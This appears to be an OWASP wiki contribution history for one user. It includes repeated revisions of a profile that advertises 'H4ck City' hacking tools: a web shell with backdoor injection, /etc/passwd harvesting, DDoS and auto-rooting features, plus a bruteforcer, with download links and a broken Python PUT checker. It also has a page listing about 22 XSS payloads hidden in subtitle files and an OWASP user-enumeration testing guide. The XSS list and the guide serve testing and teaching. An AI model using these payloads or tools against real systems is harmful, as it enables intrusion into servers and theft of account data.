OWASP - User contributions [en]

User:2MzRp

2019-08-05T20:06:16Z

2MzRp:

== '''H4ck City Tools''' ==
H4Ck City Sheller Code With [Persian] Sheller Article : HomePage: wWw.H4cKCiTy.oRg Authored By : 2MzRp & LocaLMan Features : In This Sheller U Can Symlink All Users($Home) With Php And Perl, Inj3ct Backdoor In Index Or Another Page, Bypass Php With Different Php Bypassers , Bypass Read File With Mysql , Remote Php And Perl Ddos, Get Users From /etc/passwd In Txt , Upload Sheller In 777 Permisioned Folder , Create Many Sheller In Folder with Random Names And....

: 

:[http://packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz] 

---------------------------------------------------

H4Ck City Anti Sheller 
Authored By: Mikili
This Script Check Server Every $second For Php Or Perl Sheller And Chmoded 000 Bad Files 
[[Image:H4ck City Anti Sheller.zip]]
-----------------------------------------------

H4ck City Auto TOols 
Authored By: Farbod Mahini 
This perl script performs a variety of auto-rooting and shell install attempts on a given host once a shell is obtained. 
[[File:H4ckcity Auto TOols.zip]]
--------------------------------------------
H4ck City Bruteforcer 
Authored By: Mehdi.H4ckCity 
This Script Help U To Bruteforcer Joomla , Wordpress , Directadmin And....
U Can Check Tutorial On [http://h4ckcity.org/forums/showthread.php?tid=415 H4ckcity.Org] 
[[File:Hackcity_Bruteforcer.zip]]
---------------------------------------
H4ckcity Antisymlink 
Authored By : Mikili 
This Script Help To Prevent Symlink In Some $Folders(/*/public_html) 
[[File:Anti_Symlink.zip]]

---------------------------------------------
Ok.
Hc (H4ckcity Security Team) Now Is Close . But We Are Always Up. And Now U Can Find Us On secure-land.net
We Have A Security & Hacking Magazine In Persian(Farsi) Lang On www.offlinemag.ir So U Can Find Us In There.
New Project Coming Soon. Be Online;). 
Offline Magazine Archive: 
[http://dl.offlinemag.ir/download/Offline1HD.rar Number1:] 
[http://dl.offlinemag.ir/download/Offline2HD.rar Number2:] 
[http://dl.offlinemag.ir/download/Offline3HD.rar Number3:] 
[http://dl.offlinemag.ir/download/Offline4HD.rar Number4:] 
[http://dl.offlinemag.ir/download/Offline5HD.rar Number5:] 
[http://dl.offlinemag.ir/download/Offline6HD.rar Number6:] 

===============
Ok . SecureLand , Hc, Offlinemag Is Going Down But We Are Alive And Working Hard On Ideas 
No News Is Good News 
2MzRp(M.Mortazavi)

Testing for User Enumeration and Guessable User Account (OWASP-AT-002)

2017-12-17T12:47:55Z

2MzRp: add analyzing with time delay respons

{{Template:OWASP Testing Guide v4}}

== Brief Summary ==
The scope of this test is to verify if it is possible to collect a set of valid usernames by interacting with the authentication mechanism of the application. This test will be useful for the brute force testing, in which we verify if, given a valid username, it is possible to find the corresponding password.
Often, web applications reveal when a username exists on system, either as a consequence of a misconfiguration or as a design decision. For example, sometimes, when we submit wrong credentials, we receive a message that states that either the username is present on the system or the provided password is wrong.
The information obtained can be used by an attacker to gain a list of users on system. This information can be used to attack the web application, for example, through a brute force or default username/password attack.
 

== Description of the Issue ==
The tester should interact with the authentication mechanism of the application to understand if sending particular requests causes the application to answer in different manners. This issue exists because the information released from web application or web server when we provide a valid username is different than when we use an invalid one.

In some cases, we receive a message that reveals if the provided credentials are wrong because an invalid username or an invalid password was used. Sometimes, we can enumerate the existing users by sending a username and an empty password.

== Black Box testing and example ==
In a black box testing, we know nothing about the specific application, username, application logic, error messages on login page, or password recovery facilities.
If the application is vulnerable, we receive a response message that reveals, directly or indirectly, some information useful for enumerating users.

===HTTP Response message===

'''Testing for Valid user/right password'''

Record the server answer when you submit a valid userID and valid password.

'''Result Expected:'''

Using WebScarab, notice the information retrieved from this successful authentication (HTTP 200 Response, length of the response).

'''Testing for valid user/wrong password''' 
Now, the tester should try to insert a valid userID and a wrong password and record the error message generated by the application.

'''Result Expected:''' 
From the browser we will expect message similar to the following one: 
[[Image:AuthenticationFailed.png]] 

or something like: 
[[Image:NoConfFound.jpg]] 

against any message that reveals the existence of user, for instance, message similar to: 
Login for User foo: invalid password

Using WebScarab, notice the information retrieved from this unsuccessful authentication attempt (HTTP 200 Response, length of the response).

'''Testing for a nonexistent username'''

Now, the tester should try to insert an invalid userID and a wrong password and record the server answer (you should be confident that the username is not valid in the application). Record the error message and the server answer.

'''Result Expected:'''

If we enter a nonexistent userID, we can receive a message similar to: 
[[Image:Userisnotactive.png]] 
or message like the following one: 
Login failed for User foo: invalid Account

Generally the application should respond with the same error message and length to the different wrong requests. If you notice that the responses are not the same, you should investigate and find out the key that creates a difference between the two responses. For example:
* Client request: Valid user/wrong password --> Server answer:'The password is not correct'
* Client request: Wrong user/wrong password --> Server answer:'User not recognized'
The above responses let the client understand that for the first request we have a valid user name. So we can interact with the application requesting a set of possible userIDs and observing the answer.

Looking at the second server response, we understand in the same way that we don't hold a valid username. So we can interact in the same manner and create a list of valid userID looking at the server answers.

===Other ways to enumerate users===

We can enumerate users in several ways, such as: 
'''- Analyzing the error code received on login pages''' 
Some web application release a specific error code or message that we can analyze.

'''- Analyzing URLs, and URLs redirections''' 
For example: 
http://www.foo.com/err.jsp?User=baduser&Error=0 
http://www.foo.com/err.jsp?User=gooduser&Error=2

As we can see above, when we provide a userID and password to the web application, we see a message indication that an error has occurred in the URL.
In the first case we has provided a bad userID and bad password. In the second, a good user and bad password, so we can identify a valid userID.

'''- URI Probing''' 
Sometimes a web server responds differently if it receives a request for an existing directory or not. For instance in some portals every user is associated with a directory. If we try to access an existing directory we could receive a web server error.
A very common error that we can receive from web server is: 
403 Forbidden error code
and 
404 Not found error code
 
Example 
http://www.foo.com/account1 - we receive from web server: 403 Forbidden
http://www.foo.com/account2 - we receive from web server: 404 file Not Found

In first case the user exists, but we cannot view the web page, in second case instead the user “account2” doesn’t exist.
Collecting this information we can enumerate the users.

'''- Analyzing Web page Titles''' 
We can receive useful information on Title of web page, where we can obtain a specific error code or messages that reveal if the problems are on username or password.
For instance, if we cannot authenticate to an application and receive a web page whose title is similar to:
Invalid user
Invalid authentication

'''- Analyzing message received from recovery facility''' 
When we use a recovery facility (i.e. a Forgotten Password function) a vulnerable application might return a message that reveals if a username exists or not.

For example, message similar to the following: 
Invalid username: e-mail address is not valid or the specified user was not found.

Valid username: Your password has been successfully sent to the email address you registered with.
 

'''- Friendly 404 Error Message''' 
When we request for a user within the directory that does not exist, we don't always receive 404 error code. Instead, we may receive “200 ok” with an image, in this case we can assume that when we receive the specific image the user doesn’t exist. This logic can be applied to other web server response; the trick is a good analysis of web server and web application messages.
 
 
'''- Analyzing Time Delay'''

When you test for incorrect user you get faster response than testing correct user
Valid username: page response in 1000 millis

invalid username: page response in 80 millis
===Guessing Users===
In some cases the userIDs are created with specific policies of administrator or company.
For example we can view a user with a userID created in sequential order: 
CN000100 
CN000101 
…. 
Sometimes the usernames are created with a REALM alias and then a sequential numbers: 
R1001 – user 001 for REALM1 
R2001 – user 001 for REALM2 
 
In the above sample we can create simple shell scripts that compose UserIDs and submit a request with tool like wget to automate a web query to discern valid userIDs.
To create a script we can also use Perl and CURL.

Other possibilities are:
- userIDs associated with credit card numbers, or in general numbers with a pattern.
- userIDs associated with real names, e.g. if Freddie Mercury has a userID of "fmercury", then you might guess Roger Taylor to have the userID of "rtaylor".

Again, we can guess a username from the information received from an LDAP query or from Google information gathering, for example, from a specific domain.
Google can help to find domain users through specific queries or through a simple shell script or tool.

 
'''Attention:''' by enumerating user accounts, you risk locking out accounts after a predefined number of failed probes (based on application policy). Also, sometimes, your IP address can be banned by dynamic rules on the application firewall or Intrusion Prevention System.

== Gray Box testing and example ==
'''Testing for Authentication error messages''' 
Verify that the application answers in the same manner for every client request that produces a failed authentication. For this issue the Black Box testing and Gray Box testing have the same concept based on the analysis of messages or error codes received from web application. 
'''Result Expected:''' 
The application should answer in the same manner for every failed attempt of authentication. 
For Example: 
Credentials submitted are not valid
 

== References ==
* Marco Mella, ''Sun Java Access & Identity Manager Users enumeration: http://www.aboutsecurity.net ''
* ''Username Enumeration Vulnerabilities: http://www.gnucitizen.org/blog/username-enumeration-vulnerabilities ''

'''Tools''' 
* WebScarab: [[OWASP_WebScarab_Project]]
* CURL: http://curl.haxx.se/
* PERL: http://www.perl.org
* Sun Java Access & Identity Manager users enumeration tool: http://www.aboutsecurity.net

Xss in subtitle

2017-11-21T11:27:57Z

2MzRp:

==Description==
It is possible for an attacker to execute JavaScript in a video's subtitle. This is also referred to as XSS (Cross-Site Scripting).if a website load subtitle separately in browser then a attacker can run any html or javascript in video subtitle. It has been tested on some video services.

==Examples ==
the attacker can save the mentioned contents below by the format of srt and upload prepared srt file as a video's subtitles 

1 

00:00:37,618 --> 00:00:42,557 

<nowiki>: '';!--"<XSS>=&{()}</nowiki>

2 

00:00:58,425 --> 00:01:00,704 

<IMG SRC="javascript:alert('XSS');">

3 

00:01:00,705 --> 00:01:01,873 

<IMG SRC=javascript:alert('XSS')>

4 

00:01:02,225 --> 00:01:04,519 

<IMG SRC=javascript:alert('XSS')>

5 

00:01:04,520 --> 00:01:05,547 

<IMG SRC=javascript:alert('XSS')>

6 

00:01:05,864 --> 00:01:08,117 

<IMG SRC=javascript:alert('XSS')>

7 

00:01:08,224 --> 00:01:09,223 

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

8 

00:01:09,224 --> 00:01:10,434 

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

9 

00:01:11,384 --> 00:01:12,427 

<IMG SRC=# onmouseover="alert('xxs')">

10 

00:01:15,504 --> 00:01:17,506 

<IMG SRC= onmouseover="alert('xxs')">

11 

00:01:19,743 --> 00:01:20,786 

<IMG onmouseover="alert('xxs')">

12 

00:01:24,183 --> 00:01:25,351 

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

13 

00:01:40,663 --> 00:01:41,705 

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

14 

00:01:42,703 --> 00:01:45,742 

<IMG SRC=javascript:alert(
'XSS')>

15 

00:01:45,743 --> 00:01:46,285 

<nowiki><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041></nowiki>

16 

00:01:48,503 --> 00:01:49,545 

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

17 

00:01:49,582 --> 00:01:51,709 

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

18 

00:01:54,822 --> 00:01:58,200 

<IMG SRC="jav	ascript:alert('XSS');">

19 

00:02:01,021 --> 00:02:03,691 

<IMG SRC="jav
ascript:alert('XSS');">

20 

00:02:04,702 --> 00:02:05,744 

<IMG SRC="javascript:alert('XSS');">

21 

00:02:15,700 --> 00:02:18,536 

<IMG SRC="javascript:alert('XSS')"

22 

00:02:18,740 --> 00:02:22,619 

\";alert('XSS');//

 

= Authors and Primary Editors =

Mohammad MortazaviZade - 2mzrp2@gmail.com 

==Related [[Attacks]]==
* [[XSS Attacks]]
* [[:Category:Injection Attack]]
* [[Invoking untrusted mobile code]]
* [[Cross Site History Manipulation (XSHM)]]

==Related [[Vulnerabilities]]==
* [[:Category:Input Validation Vulnerability]]
* [[Cross Site Scripting Flaw]]
* [[Types of Cross-Site Scripting]]

==Related [[Controls]]==
* [[:Category:Input Validation]]
* [[HTML Entity Encoding]]
* [[Output Validation]]
* [[Canonicalization]]
==Categories==
[[Category:Injection]]
[[Category:Attack]]
[[Category:Code Snippet]]
{{Template:Stub}}

Xss in subtitle

2017-11-21T11:18:36Z

2MzRp:

==Description==
It is possible for an attacker to execute JavaScript in a video's subtitle. This is also referred to as XSS (Cross-Site Scripting).if a website load subtitle separately in browser then a attacker can run any html or javascript in video subtitle. It has been tested on some video services.

==Examples ==
the attacker can save the mentioned contents below by the format of srt and upload prepared srt file as a video's subtitles 

1 

00:00:37,618 --> 00:00:42,557 

<nowiki>: '';!--"<XSS>=&{()}</nowiki>

2 

00:00:58,425 --> 00:01:00,704 

<IMG SRC="javascript:alert('XSS');">

3 

00:01:00,705 --> 00:01:01,873 

<IMG SRC=javascript:alert('XSS')>

4 

00:01:02,225 --> 00:01:04,519 

<IMG SRC=javascript:alert('XSS')>

5 

00:01:04,520 --> 00:01:05,547 

<IMG SRC=javascript:alert('XSS')>

6 

00:01:05,864 --> 00:01:08,117 

<IMG SRC=javascript:alert('XSS')>

7 

00:01:08,224 --> 00:01:09,223 

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

8 

00:01:09,224 --> 00:01:10,434 

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

9 

00:01:11,384 --> 00:01:12,427 

<IMG SRC=# onmouseover="alert('xxs')">

10 

00:01:15,504 --> 00:01:17,506 

<IMG SRC= onmouseover="alert('xxs')">

11 

00:01:19,743 --> 00:01:20,786 

<IMG onmouseover="alert('xxs')">

12 

00:01:24,183 --> 00:01:25,351 

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

13 

00:01:40,663 --> 00:01:41,705 

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

14 

00:01:42,703 --> 00:01:45,742 

<IMG SRC=javascript:alert(
'XSS')>

15 

00:01:45,743 --> 00:01:46,285 

<nowiki><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041></nowiki>

16 

00:01:48,503 --> 00:01:49,545 

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

17 

00:01:49,582 --> 00:01:51,709 

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

18 

00:01:54,822 --> 00:01:58,200 

<IMG SRC="jav	ascript:alert('XSS');">

19 

00:02:01,021 --> 00:02:03,691 

<IMG SRC="jav
ascript:alert('XSS');">

20 

00:02:04,702 --> 00:02:05,744 

<IMG SRC="javascript:alert('XSS');">

21 

00:02:15,700 --> 00:02:18,536 

<IMG SRC="javascript:alert('XSS')"

22 

00:02:18,740 --> 00:02:22,619 

\";alert('XSS');//

 

= Authors and Primary Editors =

Mohammad MortazaviZade - 2mzrp2@gmail.com 
==Related Threats==

==Related Attacks==

[[XSS Attacks]]

==Related Vulnerabilities==

==Related Countermeasures==

==Categories==

{{Template:Stub}}

[[Category:Injection Attack]]

Xss in subtitle

2017-11-15T20:35:57Z

2MzRp: Spelling

==Description==
It is possible for an attacker to execute JavaScript in a video's subtitle. This is also referred to as XSS (Cross-Site Scripting).if a website load subtitle separately in browser then a attacker can run any html or javascript in video subtitle. It has been tested on some video services.

==Examples ==
the attacker can save the mentioned contents below by the format of srt and upload prepared srt file as a video's subtitles 

1 

00:00:37,618 --> 00:00:42,557 

<nowiki>: '';!--"<XSS>=&{()}</nowiki>

2 

00:00:58,425 --> 00:01:00,704 

<IMG SRC="javascript:alert('XSS');">

3 

00:01:00,705 --> 00:01:01,873 

<IMG SRC=javascript:alert('XSS')>

4 

00:01:02,225 --> 00:01:04,519 

<IMG SRC=javascript:alert('XSS')>

5 

00:01:04,520 --> 00:01:05,547 

<IMG SRC=javascript:alert('XSS')>

6 

00:01:05,864 --> 00:01:08,117 

<IMG SRC=javascript:alert('XSS')>

7 

00:01:08,224 --> 00:01:09,223 

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

8 

00:01:09,224 --> 00:01:10,434 

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

9 

00:01:11,384 --> 00:01:12,427 

<IMG SRC=# onmouseover="alert('xxs')">

10 

00:01:15,504 --> 00:01:17,506 

<IMG SRC= onmouseover="alert('xxs')">

11 

00:01:19,743 --> 00:01:20,786 

<IMG onmouseover="alert('xxs')">

12 

00:01:24,183 --> 00:01:25,351 

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

13 

00:01:40,663 --> 00:01:41,705 

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

14 

00:01:42,703 --> 00:01:45,742 

<IMG SRC=javascript:alert(
'XSS')>

15 

00:01:45,743 --> 00:01:46,285 

<nowiki><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041></nowiki>

16 

00:01:48,503 --> 00:01:49,545 

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

17 

00:01:49,582 --> 00:01:51,709 

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

18 

00:01:54,822 --> 00:01:58,200 

<IMG SRC="jav	ascript:alert('XSS');">

19 

00:02:01,021 --> 00:02:03,691 

<IMG SRC="jav
ascript:alert('XSS');">

20 

00:02:04,702 --> 00:02:05,744 

<IMG SRC="javascript:alert('XSS');">

21 

00:02:15,700 --> 00:02:18,536 

<IMG SRC="javascript:alert('XSS')"

22 

00:02:18,740 --> 00:02:22,619 

\";alert('XSS');//

 

==Related Threats==

==Related Attacks==

[[XSS Attacks]]

==Related Vulnerabilities==

==Related Countermeasures==

==Categories==

{{Template:Stub}}

[[Category:Injection Attack]]

User:2MzRp

2017-11-15T14:43:51Z

2MzRp: Add Real Name!

== '''H4ck City Tools''' ==
H4Ck City Sheller Code With [Persian] Sheller Article : HomePage: wWw.H4cKCiTy.oRg Authored By : 2MzRp & LocaLMan Features : In This Sheller U Can Symlink All Users($Home) With Php And Perl, Inj3ct Backdoor In Index Or Another Page, Bypass Php With Different Php Bypassers , Bypass Read File With Mysql , Remote Php And Perl Ddos, Get Users From /etc/passwd In Txt , Upload Sheller In 777 Permisioned Folder , Create Many Sheller In Folder with Random Names And....

: 

:[http://packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz] 

---------------------------------------------------

H4Ck City Anti Sheller 
Authored By: Mikili
This Script Check Server Every $second For Php Or Perl Sheller And Chmoded 000 Bad Files 
[[Image:H4ck City Anti Sheller.zip]]
-----------------------------------------------

H4ck City Auto TOols 
Authored By: Farbod Mahini 
This perl script performs a variety of auto-rooting and shell install attempts on a given host once a shell is obtained. 
[[File:H4ckcity Auto TOols.zip]]
--------------------------------------------
H4ck City Bruteforcer 
Authored By: Mehdi.H4ckCity 
This Script Help U To Bruteforcer Joomla , Wordpress , Directadmin And....
U Can Check Tutorial On [http://h4ckcity.org/forums/showthread.php?tid=415 H4ckcity.Org] 
[[File:Hackcity_Bruteforcer.zip]]
---------------------------------------
H4ckcity Antisymlink 
Authored By : Mikili 
This Script Help To Prevent Symlink In Some $Folders(/*/public_html) 
[[File:Anti_Symlink.zip]]

<nowiki>---------------------------------------------</nowiki>

Put Checker By Milad Khoshdel<syntaxhighlight lang="python">
#by milad (regux)
import httplib
url = raw_input("Enter URL")
h = httplib.HTTPConnection(url, '80')
h.putrequest('PUT', name)
h.putheader('User-Agent', 'put.py/1.0')
h.putheader('Connection', 'keep-alive')
h.putheader('Transfer-Encoding', 'chunked')
h.putheader('Expect', '100-continue')
h.putheader('Accept', '*/*')
if authorization:
h.putheader('Authorization', authorization)
h.endheaders()
bytes = f.read()
length = len(bytes)
h.send('%X\r\n' % length)
h.send(bytes + '\r\n')
h.send('0\r\n\r\n')

resp = h.getresponse()
status = resp.status
if status in okay:
statusLine = "status : %s %s"
print statusLine % (status, resp.reason)
print 'Put method is available \nyou can using REST CLIENT in firefox and upload file\ncheck this :'
print url+name
</syntaxhighlight>
---------------------------------------------
Ok.
Hc (H4ckcity Security Team) Now Is Close . But We Are Always Up. And Now U Can Find Us On secure-land.net
We Have A Security & Hacking Magazine In Persian(Farsi) Lang On www.offlinemag.ir So U Can Find Us In There.
New Project Coming Soon. Be Online;). 
Offline Magazine Archive: 
[http://dl.offlinemag.ir/download/Offline1HD.rar Number1:] 
[http://dl.offlinemag.ir/download/Offline2HD.rar Number2:] 
[http://dl.offlinemag.ir/download/Offline3HD.rar Number3:] 
[http://dl.offlinemag.ir/download/Offline4HD.rar Number4:] 
[http://dl.offlinemag.ir/download/Offline5HD.rar Number5:] 
[http://dl.offlinemag.ir/download/Offline6HD.rar Number6:] 

===============
Ok . SecureLand , Hc, Offlinemag Is Going Down But We Are Alive And Working Hard On Ideas 
No News Is Good News 
2MzRp(M.Mortazavi)

Xss in subtitle

2017-11-15T14:42:37Z

2MzRp: Created page with "==Description== It is possible for an attacker to execute JavaScript in a subtitle's videos. This is also referred to as XSS (Cross-Site Scripting).if a website load subtitle..."

==Description==
It is possible for an attacker to execute JavaScript in a subtitle's videos. This is also referred to as XSS (Cross-Site Scripting).if a website load subtitle separately in browser then a attacker can run any html or javascript in video subtitle. It has been tested on some video services.

==Examples ==
the attacker can upload below subtitle with srt extension to test the website 

1 

00:00:37,618 --> 00:00:42,557 

<nowiki>: '';!--"<XSS>=&{()}</nowiki>

2 

00:00:58,425 --> 00:01:00,704 

<IMG SRC="javascript:alert('XSS');">

3 

00:01:00,705 --> 00:01:01,873 

<IMG SRC=javascript:alert('XSS')>

4 

00:01:02,225 --> 00:01:04,519 

<IMG SRC=javascript:alert('XSS')>

5 

00:01:04,520 --> 00:01:05,547 

<IMG SRC=javascript:alert('XSS')>

6 

00:01:05,864 --> 00:01:08,117 

<IMG SRC=javascript:alert('XSS')>

7 

00:01:08,224 --> 00:01:09,223 

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

8 

00:01:09,224 --> 00:01:10,434 

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

9 

00:01:11,384 --> 00:01:12,427 

<IMG SRC=# onmouseover="alert('xxs')">

10 

00:01:15,504 --> 00:01:17,506 

<IMG SRC= onmouseover="alert('xxs')">

11 

00:01:19,743 --> 00:01:20,786 

<IMG onmouseover="alert('xxs')">

12 

00:01:24,183 --> 00:01:25,351 

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

13 

00:01:40,663 --> 00:01:41,705 

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

14 

00:01:42,703 --> 00:01:45,742 

<IMG SRC=javascript:alert(
'XSS')>

15 

00:01:45,743 --> 00:01:46,285 

<nowiki><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041></nowiki>

16 

00:01:48,503 --> 00:01:49,545 

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

17 

00:01:49,582 --> 00:01:51,709 

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

18 

00:01:54,822 --> 00:01:58,200 

<IMG SRC="jav	ascript:alert('XSS');">

19 

00:02:01,021 --> 00:02:03,691 

<IMG SRC="jav
ascript:alert('XSS');">

20 

00:02:04,702 --> 00:02:05,744 

<IMG SRC="javascript:alert('XSS');">

21 

00:02:15,700 --> 00:02:18,536 

<IMG SRC="javascript:alert('XSS')"

22 

00:02:18,740 --> 00:02:22,619 

\";alert('XSS');//

 

==Related Threats==

==Related Attacks==

[[XSS Attacks]]

==Related Vulnerabilities==

==Related Countermeasures==

==Categories==

{{Template:Stub}}

[[Category:Injection Attack]]

User:2MzRp

2017-09-05T18:28:31Z

2MzRp: /* H4ck City Tools */

== '''H4ck City Tools''' ==
H4Ck City Sheller Code With [Persian] Sheller Article : HomePage: wWw.H4cKCiTy.oRg Authored By : 2MzRp & LocaLMan Features : In This Sheller U Can Symlink All Users($Home) With Php And Perl, Inj3ct Backdoor In Index Or Another Page, Bypass Php With Different Php Bypassers , Bypass Read File With Mysql , Remote Php And Perl Ddos, Get Users From /etc/passwd In Txt , Upload Sheller In 777 Permisioned Folder , Create Many Sheller In Folder with Random Names And....

: 

:[http://packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz] 

---------------------------------------------------

H4Ck City Anti Sheller 
Authored By: Mikili
This Script Check Server Every $second For Php Or Perl Sheller And Chmoded 000 Bad Files 
[[Image:H4ck City Anti Sheller.zip]]
-----------------------------------------------

H4ck City Auto TOols 
Authored By: Farbod Mahini 
This perl script performs a variety of auto-rooting and shell install attempts on a given host once a shell is obtained. 
[[File:H4ckcity Auto TOols.zip]]
--------------------------------------------
H4ck City Bruteforcer 
Authored By: Mehdi.H4ckCity 
This Script Help U To Bruteforcer Joomla , Wordpress , Directadmin And....
U Can Check Tutorial On [http://h4ckcity.org/forums/showthread.php?tid=415 H4ckcity.Org] 
[[File:Hackcity_Bruteforcer.zip]]
---------------------------------------
H4ckcity Antisymlink 
Authored By : Mikili 
This Script Help To Prevent Symlink In Some $Folders(/*/public_html) 
[[File:Anti_Symlink.zip]]

<nowiki>---------------------------------------------</nowiki>

Put Checker By Milad Khoshdel<syntaxhighlight lang="python">
#by milad (regux)
import httplib
url = raw_input("Enter URL")
h = httplib.HTTPConnection(url, '80')
h.putrequest('PUT', name)
h.putheader('User-Agent', 'put.py/1.0')
h.putheader('Connection', 'keep-alive')
h.putheader('Transfer-Encoding', 'chunked')
h.putheader('Expect', '100-continue')
h.putheader('Accept', '*/*')
if authorization:
h.putheader('Authorization', authorization)
h.endheaders()
bytes = f.read()
length = len(bytes)
h.send('%X\r\n' % length)
h.send(bytes + '\r\n')
h.send('0\r\n\r\n')

resp = h.getresponse()
status = resp.status
if status in okay:
statusLine = "status : %s %s"
print statusLine % (status, resp.reason)
print 'Put method is available \nyou can using REST CLIENT in firefox and upload file\ncheck this :'
print url+name
</syntaxhighlight>
---------------------------------------------
Ok.
Hc (H4ckcity Security Team) Now Is Close . But We Are Always Up. And Now U Can Find Us On secure-land.net
We Have A Security & Hacking Magazine In Persian(Farsi) Lang On www.offlinemag.ir So U Can Find Us In There.
New Project Coming Soon. Be Online;). 
Offline Magazine Archive: 
[http://dl.offlinemag.ir/download/Offline1HD.rar Number1:] 
[http://dl.offlinemag.ir/download/Offline2HD.rar Number2:] 
[http://dl.offlinemag.ir/download/Offline3HD.rar Number3:] 
[http://dl.offlinemag.ir/download/Offline4HD.rar Number4:] 
[http://dl.offlinemag.ir/download/Offline5HD.rar Number5:] 
[http://dl.offlinemag.ir/download/Offline6HD.rar Number6:] 

===============
Ok . SecureLand , Hc, Offlinemag Is Going Down But We Are Alive And Working Hard On Ideas 
No News Is Good News 
2MzRp

User:2MzRp

2016-02-20T12:51:35Z

2MzRp: /* = */

== '''H4ck City Tools''' ==
H4Ck City Sheller Code With [Persian] Sheller Article : HomePage: wWw.H4cKCiTy.oRg Authored By : 2MzRp & LocaLMan Features : In This Sheller U Can Symlink All Users($Home) With Php And Perl, Inj3ct Backdoor In Index Or Another Page, Bypass Php With Different Php Bypassers , Bypass Read File With Mysql , Remote Php And Perl Ddos, Get Users From /etc/passwd In Txt , Upload Sheller In 777 Permisioned Folder , Create Many Sheller In Folder with Random Names And....

: 

:[http://packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz packetstorm.interhost.co.il/UNIX/penetration/rootkits/hackcity-shell.tgz] 

---------------------------------------------------

H4Ck City Anti Sheller 
Authored By: Mikili
This Script Check Server Every $second For Php Or Perl Sheller And Chmoded 000 Bad Files 
[[Image:H4ck City Anti Sheller.zip]]
-----------------------------------------------

H4ck City Auto TOols 
Authored By: Farbod Mahini 
This perl script performs a variety of auto-rooting and shell install attempts on a given host once a shell is obtained. 
[[File:H4ckcity Auto TOols.zip]]
--------------------------------------------
H4ck City Bruteforcer 
Authored By: Mehdi.H4ckCity 
This Script Help U To Bruteforcer Joomla , Wordpress , Directadmin And....
